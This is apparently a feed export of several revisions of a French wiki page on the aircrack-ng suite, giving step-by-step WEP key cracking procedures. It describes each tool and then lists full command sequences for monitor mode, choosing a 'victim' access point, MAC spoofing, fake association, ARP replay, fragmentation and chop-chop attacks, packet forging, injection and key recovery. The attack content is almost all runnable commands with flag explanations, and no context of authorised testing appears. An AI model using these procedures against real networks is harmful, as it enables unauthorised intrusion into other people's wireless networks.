&amp;gt;&amp;gt;&amp;gt; aireplay-ng -1 0 -e $essid_cible -a $bssid_cible -h $mac_carte $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-1 = fake association&lt;br /&gt;
&amp;lt;br /&amp;gt;0 = temps d'attente (en ms) entre 2 tentatives&lt;br /&gt;
&amp;lt;br /&amp;gt;''En cas de succes, &amp;quot;Association successful :-)&amp;quot; doit s'afficher''&lt;br /&gt;
** En cas d'échec:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -1 6000 -o 1 -q 10 -e $essid_cible -a $bssid_cible -h $mac_carte $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;6000 = temps d'attente (en ms) entre 2 tentatives&lt;br /&gt;
&amp;lt;br /&amp;gt;-o = nombre de jeux de paquets à envoyer à la fois&lt;br /&gt;
&amp;lt;br /&amp;gt;-q = intervale entre 2 paquets &amp;quot;keep-alive&amp;quot;&lt;br /&gt;
&lt;br /&gt;
* Attaque:&lt;br /&gt;
Ces 2 attaques permettent d'obtenir un PRGA (Pseudo Random Generation Algorythme) afin de créer un paquet ARP à injecter. Si l'attaque par fragmentation ne donne rien, on tentera la méthode chop-chop.&lt;br /&gt;
&amp;lt;br /&amp;gt;Dans les 2 cas, un fichier .xor sera créé en cas de succès.&lt;br /&gt;
** Par fragmentation:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -5 -b $bssid_cible -h $mac_carte $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-5 = attaque par fragmentation&lt;br /&gt;
** Chop-chop:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -4 -b $bssid_cible -h $mac_carte $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-4 = attaque chop-chop&lt;br /&gt;
&lt;br /&gt;
* Création d'un paquet ARP:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; packetforge-ng -0 -a $bssid_cible -h mac_carte -k 255.255.255.255 -l 255.255.255.255 -y $fichier_xor -w $fichier_arp&lt;br /&gt;
&amp;lt;br /&amp;gt;-0 = générer un paquet ARP&lt;br /&gt;
&amp;lt;br /&amp;gt;-k = IP de destination (la plupart des AP répondent au 255.255.255.255)&lt;br /&gt;
&amp;lt;br /&amp;gt;-l = IP source (la plupart des AP répondent au 255.255.255.255)&lt;br /&gt;
&amp;lt;br /&amp;gt;-w = nom du fichier dans lequel mettre le paquet ARP&lt;br /&gt;
&lt;br /&gt;
* Injection de l'ARP:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -2 -r $fichier_arp $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-2 = selection de paquets interactive (accepter le paquet avec &amp;quot;y&amp;quot;)&lt;br /&gt;
&amp;lt;br /&amp;gt;''Surveiller la colonne #Data (correspond aux IVs) dans airodump, en cas de succès cette valeur augmente. En cas d'échec ou d'injection trop lente, couper avec Ctrl+C et utiliser le paquet suivant''&lt;br /&gt;
&lt;br /&gt;
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aircrack-ng $fichier_capture&lt;br /&gt;
&lt;br /&gt;
=== Méthode &amp;quot;-p 0841&amp;quot; ===&lt;br /&gt;
'''Méthode avec ou sans client (si filtrage MAC activé, il faut absolument un client connecté afin de spoofer son adresse MAC comme expliqué plus haut)'''&lt;br /&gt;
* Mettre la carte en mode monitor:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; ifconfig $iface down&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airmon-ng start $iface&lt;br /&gt;
&lt;br /&gt;
* Trouver une victime:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airodump-ng $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;''Couper une fois la victime trouvée''&lt;br /&gt;
&lt;br /&gt;
* Lancer la capture d'IVs:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airodump-ng -c $canal --bssid $bssid_cible -w $fichier_capture $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-w = préfixe à utiliser pour le nom du fichier de capture&lt;br /&gt;
&amp;lt;br /&amp;gt;''Laisser tourner...''&lt;br /&gt;
&lt;br /&gt;
* Associer la carte à la station:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay -1 0 -e $essid_cible -a $bssid_cible -h $mac_carte $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-1 = fake association&lt;br /&gt;
&amp;lt;br /&amp;gt;0 = temps d'attente (en ms) entre 2 tentatives&lt;br /&gt;
&amp;lt;br /&amp;gt;''En cas de succès, &amp;quot;Association successful :-)&amp;quot; doit s'afficher&lt;br /&gt;
** En cas d'échec:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -1 6000 -o 1 -q 10 -e $essid_cible -a $bssid_cible -h $mac_carte $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;6000 = temps d'attente (en ms) entre 2 tentatives&lt;br /&gt;
&amp;lt;br /&amp;gt;-o = nombre de jeux de paquets à envoyer à la fois&lt;br /&gt;
&amp;lt;br /&amp;gt;-q = intervale entre 2 paquets &amp;quot;keep-alive&amp;quot;&lt;br /&gt;
&lt;br /&gt;
* Lancer l'injection:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b $bssid_cible -h $mac_carte $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-2 = sélection de paquets interactive (accepter le paquet avec &amp;quot;y&amp;quot;)&lt;br /&gt;
&amp;lt;br /&amp;gt;-c = considérer l'adresse MAC de l'AP comme une adresse broadcast, force l'AP à renvoyer des paquets&lt;br /&gt;
&amp;lt;br /&amp;gt;''Surveiller la colonne #Data (correspond aux IVs) dans airodump-ng, en cas de succès cette valeur augmente. En cas d'échec ou d'injection trop lente, couper avec Ctrl+C et utiliser le paquet suivant''&lt;br /&gt;
&lt;br /&gt;
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aircrack-ng $fichier_capture&lt;/div&gt;</summary>
		<author><name>Mattoufoutu</name></author>	</entry>

	<entry>
		<id>http://hack-it.org/index.php?title=Aircrack-ng</id>
		<title>Aircrack-ng</title>
		<link rel="alternate" type="text/html" href="http://hack-it.org/index.php?title=Aircrack-ng"/>
				<updated>2008-12-20T19:42:17Z</updated>
		
		<summary type="html">&lt;p&gt;Mattoufoutu&amp;nbsp;:&amp;#32;/* Les différents types d'attaques */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Les outils de la suite aircrack ==&lt;br /&gt;
&lt;br /&gt;
=== aircrack-ng ===&lt;br /&gt;
Sert à casser la clé WEP, depuis la derniere version, il utilise l'algorythme PTW par défaut.&lt;br /&gt;
&lt;br /&gt;
=== airbase-ng ===&lt;br /&gt;
Sert à simuler un point d'accès afin d'attaquer le client qui se connectera au &amp;quot;fake-ap&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
=== airdecap-ng ===&lt;br /&gt;
Sert à déchiffrer un fichier pcap (.cap) à l'aide de la clé WEP/WPA si nécessaire, afin de pouvoir consulter les paquets à l'aide d'un logiciel tel que wireshark.&lt;br /&gt;
&lt;br /&gt;
=== airdecloak-ng ===&lt;br /&gt;
Sert à décloaker (démasquer) les bssid cloakés&lt;br /&gt;
&lt;br /&gt;
=== airdriver-ng ===&lt;br /&gt;
Sert à compiler, dés/installer les drivers appropriés à votre carte.&lt;br /&gt;
&lt;br /&gt;
=== aireplay-ng ===&lt;br /&gt;
Sert à injecter des paquets et à s'authentifier auprès des AP.&lt;br /&gt;
&lt;br /&gt;
=== airmon-ng ===&lt;br /&gt;
Sert à dés/activer le mode monitor sur votre carte.&lt;br /&gt;
&lt;br /&gt;
=== airodump-ng ===&lt;br /&gt;
Sert à rechercher des AP cibles et de voir les stations associées aux AP. Permet également de capturer les paquets lors de l'attaque.&lt;br /&gt;
&lt;br /&gt;
=== airserv-ng ===&lt;br /&gt;
Serveur pour carte WiFi. Permet à plusieurs applications sans fil d'utiliser indépendament la carte via une connection TCP de type client-serveur.&lt;br /&gt;
&lt;br /&gt;
=== airolib-ng ===&lt;br /&gt;
Permet de créer une base de données sqlite en vue d'un crack WPA.&lt;br /&gt;
&amp;lt;br /&amp;gt;'''ATTENTION: Pour fonctionner, vous devez avoir compilé aircrack avec le support pour sqlite.'''&lt;br /&gt;
&lt;br /&gt;
=== airtun-ng ===&lt;br /&gt;
&lt;br /&gt;
=== buddy-ng ===&lt;br /&gt;
A utiliser avec easside-ng&lt;br /&gt;
&lt;br /&gt;
=== easside-ng ===&lt;br /&gt;
Outil &amp;quot;auto-magic&amp;quot; permettant de communiquer avec un AP utilisant le chiffrement WEP sans en connaitre la clé.&lt;br /&gt;
&lt;br /&gt;
=== ivstools ===&lt;br /&gt;
Permet d'extraire les IVs d'un fichier pcap, ou bien de rassembler plusieurs fichiers .ivs en un seul.&lt;br /&gt;
&lt;br /&gt;
=== makeivs ===&lt;br /&gt;
Permet de créer un fichier .ivs à partir d'une clé WEP connue.&lt;br /&gt;
&lt;br /&gt;
=== packetforge-ng ===&lt;br /&gt;
Sert à forger des paquets de différents types (le plus souvent un ARP en vue d'une injection).&lt;br /&gt;
&lt;br /&gt;
=== tkiptun-ng ===&lt;br /&gt;
Permet d'aider au crack de clés WPA utilisant TKIP.&lt;br /&gt;
&amp;lt;br /&amp;gt;'''ATTENTION: Cet outil n'est pas encore fonctionnel.'''&lt;br /&gt;
&lt;br /&gt;
=== wesside-ng ===&lt;br /&gt;
Outil permettant l'automatisation du crack de clé WEP.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;&amp;lt;big&amp;gt;&amp;lt;u&amp;gt;'''TOUTES LES COMMANDES CI-DESSOUS SONT A EFFECTUER EN ROOT'''&amp;lt;/u&amp;gt;&amp;lt;/big&amp;gt;&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Les drivers WiFi ==&lt;br /&gt;
Pour charger, décharger ou compiler des drivers, utiliser airdriver-ng.&lt;br /&gt;
* Pour connaitre les drivers supportés:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airdriver-ng supported&lt;br /&gt;
&lt;br /&gt;
* Pour connaitre les drivers déjà installés:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aidriver-ng installed&lt;br /&gt;
&lt;br /&gt;
* Pour connaitre les drivers WiFi chargés dans le kernel:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airdriver-ng loaded&lt;br /&gt;
&lt;br /&gt;
* Pour détecter les cartes WiFi:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airdriver-ng detect&lt;br /&gt;
&lt;br /&gt;
* Pour décharger un driver inutile:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airdriver-ng unload $num_driver&lt;br /&gt;
&lt;br /&gt;
* Pour compiler un driver:&lt;br /&gt;
Récupérer les sources du kernel, s'assurer d'avoir les outils de compilation classiques installés, puis taper:&lt;br /&gt;
&amp;lt;br /&amp;gt;&amp;gt;&amp;gt;&amp;gt; airdriver-ng compile $num_driver&lt;br /&gt;
&lt;br /&gt;
* Pour installer un driver fraichement compilé:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airdriver-ng install $num_driver&lt;br /&gt;
&lt;br /&gt;
* Pour charger un driver dans le kernel:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airdriver-ng load $num_driver&lt;br /&gt;
&lt;br /&gt;
* Pour avoir des détails sur un driver:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airdriver-ng details $num_driver&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Les différents types d'attaques ==&lt;br /&gt;
Dans les cas où l'association ne fonctionne pas, il faut couper la carte, changer l'adresse mac de la carte par celle d'un client connecté à la station avec une commande du type &amp;quot;macchanger --mac $mac $iface&amp;quot;, et relancer la carte.&lt;br /&gt;
&lt;br /&gt;
=== Légende ===&lt;br /&gt;
$iface : interface correspondant à la carte WiFi (wlan0, rausb0, mon0 ou autre)&lt;br /&gt;
&amp;lt;br /&amp;gt;$canal = canal wifi à utiliser (colonne &amp;quot;CH&amp;quot; dans airodump-ng)&lt;br /&gt;
&amp;lt;br /&amp;gt;$bssid_cible = BSSID du point d'acces ciblé&lt;br /&gt;
&amp;lt;br /&amp;gt;$essid_cible = ESSID du point d'acces ciblé (peut parfois etre masqué)&lt;br /&gt;
&amp;lt;br /&amp;gt;$mac_carte = adresse MAC de la carte wifi (peut etre la meme que celle d'un client connecté en cas de MAC spoofing)&lt;br /&gt;
&amp;lt;br /&amp;gt;$mac_client = adresse MAC du client associé au point d'acces ciblé (colonne &amp;quot;STATION&amp;quot; dans airodump-ng)&lt;br /&gt;
&lt;br /&gt;
=== Mac spoofing ===&lt;br /&gt;
Pour les procédures ci-dessous, dans les cas où l'association ne fonctionne pas, il faut couper la carte, changer l'adresse mac de la carte par celle d'un client connecté à la station avec une commande du type:&lt;br /&gt;
&amp;lt;br /&amp;gt;&amp;gt;&amp;gt;&amp;gt;macchanger --mac $mac $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;et relancer la carte.&lt;br /&gt;
&lt;br /&gt;
=== Méthode &amp;quot;ARP replay&amp;quot; ===&lt;br /&gt;
'''Méthode avec client (en cas de filtrage MAC, spoofer l'adresse MAC du client comme expliqué plus haut)'''&lt;br /&gt;
* Mettre carte en monitor:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; ifconfig $iface down&lt;br /&gt;
&amp;lt;br /&amp;gt;&amp;gt;&amp;gt;&amp;gt; airmon-ng start $iface&lt;br /&gt;
&lt;br /&gt;
* Trouver une victime:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airodump-ng $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;''Couper une fois la victime trouvée''&lt;br /&gt;
&lt;br /&gt;
* Lancer la capture d'IVs:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airodump-ng -c $canal -w $fichier_capture $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-w = préfixe à utiliser pour le nom du fichier de capture&lt;br /&gt;
&amp;lt;br /&amp;gt;''Laisser tourner...''&lt;br /&gt;
&lt;br /&gt;
* Associer la carte à l'AP:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -1 30 -e $essid_cible -a $bssid_cible -h $mac_client $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-1 = fake association&lt;br /&gt;
&amp;lt;br /&amp;gt;30 = temps d'attente entre 2 tentatives&lt;br /&gt;
&amp;lt;br /&amp;gt;''En cas de succes, &amp;quot;Association successful :-)&amp;quot; doit s'afficher''&lt;br /&gt;
&lt;br /&gt;
* Lancer l'injection:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -3 -e $essid_cible -a $bssid_cible -h $mac_client $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-3 = attaque ARP replay&lt;br /&gt;
&amp;lt;br /&amp;gt;''Surveiller la colonne #Data (correspond aux IVs) dans airodump, en cas de succès cette valeur augmente''&lt;br /&gt;
&lt;br /&gt;
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aircrack-ng $fichier_capture&lt;br /&gt;
&lt;br /&gt;
=== Methode &amp;quot;chop-chop&amp;quot; et &amp;quot;par fragmentation&amp;quot; ===&lt;br /&gt;
'''Méthodes avec ou sans client (si filtrage MAC activé, il faut absolument un client connecté afin de spoofer son adresse MAC comme expliqué plus haut)'''&lt;br /&gt;
* Mettre la carte en monitor:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; ifconfig $iface down&lt;br /&gt;
&amp;lt;br /&amp;gt;&amp;gt;&amp;gt;&amp;gt; airmon-ng start $iface&lt;br /&gt;
&lt;br /&gt;
* Trouver une victime:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airodum-ng $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;''Couper une fois la victime trouvée''&lt;br /&gt;
&lt;br /&gt;
* Lancer la capture d'IVs:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airodum-ng -c $canal --bssid $bssid_cible -w $fichier_capture $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-w = préfice à utiliser pour le nom du fichier de capture&lt;br /&gt;
&amp;lt;br /&amp;gt;''Laisser tourner...''&lt;br /&gt;
&lt;br /&gt;
* Associer la carte à l'AP:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -1 0 -e $essid_cible -a $bssid_cible -h $mac_carte $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-1 = fake association&lt;br /&gt;
&amp;lt;br /&amp;gt;0 = temps d'attente (en ms) entre 2 tentatives&lt;br /&gt;
&amp;lt;br /&amp;gt;''En cas de succes, &amp;quot;Association successful :-)&amp;quot; doit s'afficher''&lt;br /&gt;
** En cas d'échec:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -1 6000 -o 1 -q 10 -e $essid_cible -a $bssid_cible -h $mac_carte $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;6000 = temps d'attente (en ms) entre 2 tentatives&lt;br /&gt;
&amp;lt;br /&amp;gt;-o = nombre de jeux de paquets à envoyer à la fois&lt;br /&gt;
&amp;lt;br /&amp;gt;-q = intervale entre 2 paquets &amp;quot;keep-alive&amp;quot;&lt;br /&gt;
&lt;br /&gt;
* Attaque:&lt;br /&gt;
Ces 2 attaques permettent d'obtenir un PRGA (Pseudo Random Generation Algorythme) afin de créer un paquet ARP à injecter. Si l'attaque par fragmentation ne donne rien, on tentera la méthode chop-chop.&lt;br /&gt;
&amp;lt;br /&amp;gt;Dans les 2 cas, un fichier .xor sera créé en cas de succès.&lt;br /&gt;
** Par fragmentation:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -5 -b $bssid_cible -h $mac_carte $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-5 = attaque par fragmentation&lt;br /&gt;
** Chop-chop:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -4 -b $bssid_cible -h $mac_carte $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-4 = attaque chop-chop&lt;br /&gt;
&lt;br /&gt;
* Création d'un paquet ARP:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; packetforge-ng -0 -a $bssid_cible -h mac_carte -k 255.255.255.255 -l 255.255.255.255 -y $fichier_xor -w $fichier_arp&lt;br /&gt;
&amp;lt;br /&amp;gt;-0 = générer un paquet ARP&lt;br /&gt;
&amp;lt;br /&amp;gt;-k = IP de destination (la plupart des AP répondent au 255.255.255.255)&lt;br /&gt;
&amp;lt;br /&amp;gt;-l = IP source (la plupart des AP répondent au 255.255.255.255)&lt;br /&gt;
&amp;lt;br /&amp;gt;-w = nom du fichier dans lequel mettre le paquet ARP&lt;br /&gt;
&lt;br /&gt;
* Injection de l'ARP:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -2 -r $fichier_arp $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-2 = selection de paquets interactive (accepter le paquet avec &amp;quot;y&amp;quot;)&lt;br /&gt;
&amp;lt;br /&amp;gt;''Surveiller la colonne #Data (correspond aux IVs) dans airodump, en cas de succès cette valeur augmente. En cas d'échec ou d'injection trop lente, couper avec Ctrl+C et utiliser le paquet suivant''&lt;br /&gt;
&lt;br /&gt;
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aircrack-ng $fichier_capture&lt;br /&gt;
&lt;br /&gt;
=== Méthode &amp;quot;-p 0841&amp;quot; ===&lt;br /&gt;
'''Méthode avec ou sans client (si filtrage MAC activé, il faut absolument un client connecté afin de spoofer son adresse MAC comme expliqué plus haut)'''&lt;br /&gt;
* Mettre la carte en mode monitor:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; ifconfig $iface down&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airmon-ng start $iface&lt;br /&gt;
&lt;br /&gt;
* Trouver une victime:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airodump-ng $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;''Couper une fois la victime trouvée''&lt;br /&gt;
&lt;br /&gt;
* Lancer la capture d'IVs:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airodump-ng -c $canal --bssid $bssid_cible -w $fichier_capture $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-w = préfixe à utiliser pour le nom du fichier de capture&lt;br /&gt;
&amp;lt;br /&amp;gt;''Laisser tourner...''&lt;br /&gt;
&lt;br /&gt;
* Associer la carte à la station:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay -1 0 -e $essid_cible -a $bssid_cible -h $mac_carte $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-1 = fake association&lt;br /&gt;
&amp;lt;br /&amp;gt;0 = temps d'attente (en ms) entre 2 tentatives&lt;br /&gt;
&amp;lt;br /&amp;gt;''En cas de succès, &amp;quot;Association successful :-)&amp;quot; doit s'afficher&lt;br /&gt;
** En cas d'échec:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -1 6000 -o 1 -q 10 -e $essid_cible -a $bssid_cible -h $mac_carte $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;6000 = temps d'attente (en ms) entre 2 tentatives&lt;br /&gt;
&amp;lt;br /&amp;gt;-o = nombre de jeux de paquets à envoyer à la fois&lt;br /&gt;
&amp;lt;br /&amp;gt;-q = intervale entre 2 paquets &amp;quot;keep-alive&amp;quot;&lt;br /&gt;
&lt;br /&gt;
* Lancer l'injection:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b $bssid_cible -h $mac_carte $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-2 = sélection de paquets interactive (accepter le paquet avec &amp;quot;y&amp;quot;)&lt;br /&gt;
&amp;lt;br /&amp;gt;-c = considérer l'adresse MAC de l'AP comme une adresse broadcast, force l'AP à renvoyer des paquets&lt;br /&gt;
&amp;lt;br /&amp;gt;''Surveiller la colonne #Data (correspond aux IVs) dans airodump-ng, en cas de succès cette valeur augmente. En cas d'échec ou d'injection trop lente, couper avec Ctrl+C et utiliser le paquet suivant''&lt;br /&gt;
&lt;br /&gt;
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aircrack-ng $fichier_capture&lt;/div&gt;</summary>
		<author><name>Mattoufoutu</name></author>	</entry>

	<entry>
		<id>http://hack-it.org/index.php?title=Aircrack-ng</id>
		<title>Aircrack-ng</title>
		<link rel="alternate" type="text/html" href="http://hack-it.org/index.php?title=Aircrack-ng"/>
				<updated>2008-12-19T02:29:29Z</updated>
		
		<summary type="html">&lt;p&gt;Mattoufoutu&amp;nbsp;:&amp;#32;/* Methode &amp;quot;chop-chop&amp;quot; et par fragmentation */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Les outils de la suite aircrack ==&lt;br /&gt;
&lt;br /&gt;
=== aircrack-ng ===&lt;br /&gt;
Sert à casser la clé WEP, depuis la derniere version, il utilise l'algorythme PTW par défaut.&lt;br /&gt;
&lt;br /&gt;
=== airbase-ng ===&lt;br /&gt;
Sert à simuler un point d'accès afin d'attaquer le client qui se connectera au &amp;quot;fake-ap&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
=== airdecap-ng ===&lt;br /&gt;
Sert à déchiffrer un fichier pcap (.cap) à l'aide de la clé WEP/WPA si nécessaire, afin de pouvoir consulter les paquets à l'aide d'un logiciel tel que wireshark.&lt;br /&gt;
&lt;br /&gt;
=== airdecloak-ng ===&lt;br /&gt;
Sert à décloaker (démasquer) les bssid cloakés&lt;br /&gt;
&lt;br /&gt;
=== airdriver-ng ===&lt;br /&gt;
Sert à compiler, dés/installer les drivers appropriés à votre carte.&lt;br /&gt;
&lt;br /&gt;
=== aireplay-ng ===&lt;br /&gt;
Sert à injecter des paquets et à s'authentifier auprès des AP.&lt;br /&gt;
&lt;br /&gt;
=== airmon-ng ===&lt;br /&gt;
Sert à dés/activer le mode monitor sur votre carte.&lt;br /&gt;
&lt;br /&gt;
=== airodump-ng ===&lt;br /&gt;
Sert à rechercher des AP cibles et de voir les stations associées aux AP. Permet également de capturer les paquets lors de l'attaque.&lt;br /&gt;
&lt;br /&gt;
=== airserv-ng ===&lt;br /&gt;
Serveur pour carte WiFi. Permet à plusieurs applications sans fil d'utiliser indépendament la carte via une connection TCP de type client-serveur.&lt;br /&gt;
&lt;br /&gt;
=== airolib-ng ===&lt;br /&gt;
Permet de créer une base de données sqlite en vue d'un crack WPA.&lt;br /&gt;
&amp;lt;br /&amp;gt;'''ATTENTION: Pour fonctionner, vous devez avoir compilé aircrack avec le support pour sqlite.'''&lt;br /&gt;
&lt;br /&gt;
=== airtun-ng ===&lt;br /&gt;
&lt;br /&gt;
=== buddy-ng ===&lt;br /&gt;
A utiliser avec easside-ng&lt;br /&gt;
&lt;br /&gt;
=== easside-ng ===&lt;br /&gt;
Outil &amp;quot;auto-magic&amp;quot; permettant de communiquer avec un AP utilisant le chiffrement WEP sans en connaitre la clé.&lt;br /&gt;
&lt;br /&gt;
=== ivstools ===&lt;br /&gt;
Permet d'extraire les IVs d'un fichier pcap, ou bien de rassembler plusieurs fichiers .ivs en un seul.&lt;br /&gt;
&lt;br /&gt;
=== makeivs ===&lt;br /&gt;
Permet de créer un fichier .ivs à partir d'une clé WEP connue.&lt;br /&gt;
&lt;br /&gt;
=== packetforge-ng ===&lt;br /&gt;
Sert à forger des paquets de différents types (le plus souvent un ARP en vue d'une injection).&lt;br /&gt;
&lt;br /&gt;
=== tkiptun-ng ===&lt;br /&gt;
Permet d'aider au crack de clés WPA utilisant TKIP.&lt;br /&gt;
&amp;lt;br /&amp;gt;'''ATTENTION: Cet outil n'est pas encore fonctionnel.'''&lt;br /&gt;
&lt;br /&gt;
=== wesside-ng ===&lt;br /&gt;
Outil permettant l'automatisation du crack de clé WEP.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;&amp;lt;big&amp;gt;&amp;lt;u&amp;gt;'''TOUTES LES COMMANDES CI-DESSOUS SONT A EFFECTUER EN ROOT'''&amp;lt;/u&amp;gt;&amp;lt;/big&amp;gt;&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Les drivers WiFi ==&lt;br /&gt;
Pour charger, décharger ou compiler des drivers, utiliser airdriver-ng.&lt;br /&gt;
* Pour connaitre les drivers supportés:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airdriver-ng supported&lt;br /&gt;
&lt;br /&gt;
* Pour connaitre les drivers déjà installés:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aidriver-ng installed&lt;br /&gt;
&lt;br /&gt;
* Pour connaitre les drivers WiFi chargés dans le kernel:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airdriver-ng loaded&lt;br /&gt;
&lt;br /&gt;
* Pour détecter les cartes WiFi:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airdriver-ng detect&lt;br /&gt;
&lt;br /&gt;
* Pour décharger un driver inutile:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airdriver-ng unload $num_driver&lt;br /&gt;
&lt;br /&gt;
* Pour compiler un driver:&lt;br /&gt;
Récupérer les sources du kernel, s'assurer d'avoir les outils de compilation classiques installés, puis taper:&lt;br /&gt;
&amp;lt;br /&amp;gt;&amp;gt;&amp;gt;&amp;gt; airdriver-ng compile $num_driver&lt;br /&gt;
&lt;br /&gt;
* Pour installer un driver fraichement compilé:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airdriver-ng install $num_driver&lt;br /&gt;
&lt;br /&gt;
* Pour charger un driver dans le kernel:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airdriver-ng load $num_driver&lt;br /&gt;
&lt;br /&gt;
* Pour avoir des détails sur un driver:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airdriver-ng details $num_driver&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Les différents types d'attaques ==&lt;br /&gt;
Dans les cas ou l'association ne fonctionne pas, il faut couper la carte, changer l'adresse mac de la carte par celle d'un client connecté à la station avec une commande du type &amp;quot;macchanger --mac $mac $iface&amp;quot;, et relancer la carte.&lt;br /&gt;
&lt;br /&gt;
=== Légende ===&lt;br /&gt;
$iface : interface correspondant à la carte WiFi (wlan0, rausb0, mon0 ou autre)&lt;br /&gt;
